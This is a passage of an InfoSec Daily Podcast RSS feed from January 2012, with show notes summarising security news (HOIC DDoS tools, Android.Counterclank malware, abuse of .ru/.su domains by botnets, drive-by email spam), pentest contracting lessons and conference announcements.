<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a previous blog post, we provided details of a DDoS attack tool called LOIC (Low Orbit Ion Canon) used by Anonymous in supports of denial of service attacks over the past year.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attackers are constantly changing their tactics and tools in response to defender&#39;s actions. &nbsp;Recently, the SANS Internet Storm Center (ISC) also highlighted a javascript verion of LOIC</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">that, while generating the same attack traffic as our previous analysis showed, actually executed the attacks without the user &quot;initiating&quot; the attacks by pressing any buttons.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SpiderLabs has identified a new DDoS attack tool in circulation called HOIC (High Orbit Ion Canon).</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><a href="http://www.symantec.com/connect/fr/blogs/androidcounterclank-found-official-android-market"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/fr/blogs/androidcounterclank-found-official-android-market</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec has identified multiple publisher IDs on the Android Market that are being used to push out</span><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Android.Counterclank</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. This is a minor modification of</span><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Android.Tonclank</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For each of these malicious applications, the malicious code has been grafted on to the main application in a package called &ldquo;apperhand&rdquo;. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.abuse.ch/?p=3581"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.abuse.ch/?p=3581</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the past few years the Top Level Domain (TLD) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.ru</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has been heavily abused by cybercriminals. According to ZeuS Tracker, TLD .ru was one of the most abused Top Level Domains that were used by criminals to run ZeuS botnet controllers.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Top Level Domain .ru is managed by the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Coordination Center for TLD RU</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (</span><a href="http://www.cctld.ru/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cctld.ru</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">). CCTLD.ru finally did their job well and addressed the reputation problem TLD.ru had by setting up </span><a href="http://cctld.ru/en/docs/rules.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">new terms and conditions</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for domain name registration of </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.ru </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">domains which came into force on November 11 2011.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In fact this means that a registrar can terminate a domain name when it is being used for phising attacks or when it is being used to control a botnet.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, what I can say so far is that the number of fraudulent .ru domains used by ZeuS botnet herders decreased in the beginning of 2012. I can also see that malicious .ru domains which are being added to ZeuS Tracker have a much shorter life span. While malicious .ru domains used to stay active for several weeks or months in the past, they are now getting nuked much faster (mostly within 4-24hrs). That&rsquo;s great news for the internet community!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately we all know that there is a never ending cat and mouse game between the security industry / infosec community and cybercriminals. Criminals have already noticed that their domains are getting shut down much faster. So they started to look for another TLD to use for their dirty business and found a TLD that nearly has been forgotten:</span><a href="https://en.wikipedia.org/wiki/.su"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the TLD .su</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attackers have developed a new way to infect your PC through email &#8212; without forcing you to click on an attachment.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when an email is opened in the email client. The user doesn&#39;t have to click on a link or open an attachment &#8212; just opening the email is enough.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The new generation of email-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware when the email is opened,&quot; eleven says in a news release.&quot;This is similar to so-called drive-by downloads, which infect a PC by opening an infected website in the browser.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The current wave of drive-by spam contains the subject &quot;Banking security update&quot; and has a sender address with the domain fdic.com. If the email client allows HTML emails to be displayed, the HTML code is immediately activated.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3429/0/infosec-daily-podcast-episode-581.mp3" length="20792360" type="audio/mpeg" />
		<itunes:duration>0:43:16</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Subcommittee Markup: H.R. 3674, PrECISE Act of 2011
	When: February 1, 2012
	Where: 311 Cannon House Office Building, Washington, DC (also live streaming)
	http://homeland.house.gov/markup/subcommittee-markup-hr-3674
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362
&#160;
Do you want to be labelled a criminal for copying songs off a CD that you have purchased onto your iPod? With the aforementioned bill, you will be&#8230;
&#160;
The current Canadian government wants to pass Bill C-11 (of the formerly defunct Bill C-32) under the guise of modernization of our current copyright laws. What this bill fails to do is keep any modern consumer in mind.
&#160;
With the current language of the bill regarding &#34;digital locks&#34; or DRM to many of you[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 29 Jan 2012 02:52:44 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3424</guid>
		<description><![CDATA[Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez. &#160; Guests: frontpage, connection, oncee, spridel &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this [...]]]></description>
			<content:encoded><![CDATA[<p><b>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z</b></p>
<div style="background-color: transparent"><b><span>InfoSec Daily Podcast Episode 580 for January 28, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez.</span></b></p>
<p>&nbsp;</p>
<p><b>Guests: frontpage, connection, oncee, spridel</b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heros</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p><b><br />
		<span>Information Security Blogger Awards 2012</span><br />
		<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>http://www.ashimmy.com</span></a><span>.</span></b></p>
<p><b><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></b></p>
<p><b><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span>Schmoocon Epilogue</span><br />
		<span>When: After Schmoocon</span><br />
		<span>Where: Washington, DC</span><br />
		<span>Hit up anyone in NOVA Hackers</span></b></p>
<p><b><span>Metasploit Framework Unleashed Cincinnati</span><br />
		<span>When: February 11, 2012. </span><br />
		<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
		<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
		<span>$20 donation for #HFC</span></b></p>
<p><b><span>Social Engineering Training</span><br />
		<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: Seattle, Washington<br />
		<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: Black Hat Vegas<br />
		<span>When: August 20-24, 2012</span><br />
		<span>Where: &nbsp;Bristol, UK</span><br />
		<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
		</span></b></p>
<p><b>Where: &nbsp;Columbia, MD <br />
		<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<span>Huntington, West Virginia </span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP closes March 30!</span></b></p>
<p><b><span>LayerOne 2012</span><br />
		<span>When: May 26-27, 2012</span><br />
		<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
		<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Pentest Lessons:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span> </span><span>https://twitter.com/pentestlessons</span></a><span>.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 1: </span><span>If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &nbsp;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &nbsp;Also, when you talk to a lawyer, don&rsquo;t make small talk. &nbsp;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 2:</span><span> Depending on the nature of your pentest, consider adding geography into the scope agreement. &nbsp;Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. &nbsp;The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 3:</span><span> Many small-business IT outsourcing firms are now tacking &ldquo;Security&rdquo; onto their product offerings (for example &ldquo;Bob&rsquo;s Computers: Service, Sales, Security&rdquo;). &nbsp;As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking if backups are being stored offsite, and that user drives have appropriate permissions. &nbsp;Fear not, there&rsquo;s a resource for this: THE PTES. &nbsp;Read it; use the appropriate sections, google the shit out of everything you don&rsquo;t understand.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>[Thanks listener Adam]</span></b></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://arstechnica.com/tech-policy/news/2012/01/twitter-uncloaks-a-years-worth-of-dmca-takedown-notices-4410-in-all.ars"><span>http://arstechnica.com/tech-policy/news/2012/01/twitter-uncloaks-a-years-worth-of-dmca-takedown-notices-4410-in-all.ars</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>On almost any given day, Twitter receives a handful of requests to delete tweets that link to pirated versions of copyrighted content&mdash;and quickly complies by erasing the offending tweets from its site.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>But Twitter has taken the unusual step of making DMCA takedown notices public, in partnership with Chilling Effects, a project of the Electronic Frontier Foundation and several universities. The site shows 4,410 cease and desist notices dating back to November 2010. While most of 2011 shows daily or near-daily activity, there is just one notice in January 2012, suggesting either that Twitter is suddenly receiving fewer DMCA takedown notices or that the database is not quite up to date.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Twitter was already submitting data to Chilling Effects prior to this week, but this latest iteration makes it easier for users to locate Twitter-specific takedown notices. If you search the Chilling Effects site, you can also find many thousands of DMCA notices issued to Google, but Facebook has kept its own notices private.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars"><span>http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars</span></a></b></p>
<p><b><br />
		<span>Kinect&#039;s vision and depth perception technology could soon be integrated into laptops. </span><a href="http://www.thedaily.com/page/2012/01/27/012712-tech-kinect-laptop/"><span>The Daily</span></a><span> has seen two prototypes, believed to be from Asus, that incorporate an array of sensors above the top of the screen, replacing the traditional webcam. Below the display are a set of LEDs. Sources at Microsoft confirmed to </span><span>The Daily</span><span> that the laptops contain versions of the Kinect sensor.</span></b></p>
<p><b><span>Asus has dabbled with Kinect-like systems before. Its </span><a href="http://arstechnica.com/gadgets/news/2011/01/kinect-designers-to-debut-motion-controller-for-pcs.ars"><span>Xtion PRO</span></a><span> PC peripheral uses sensor and software technology licensed from </span><a href="http://www.primesense.com/"><span>PrimeSense</span></a><span>&mdash;technology also found in Microsoft&#039;s Kinect sensor.</span></b></p>
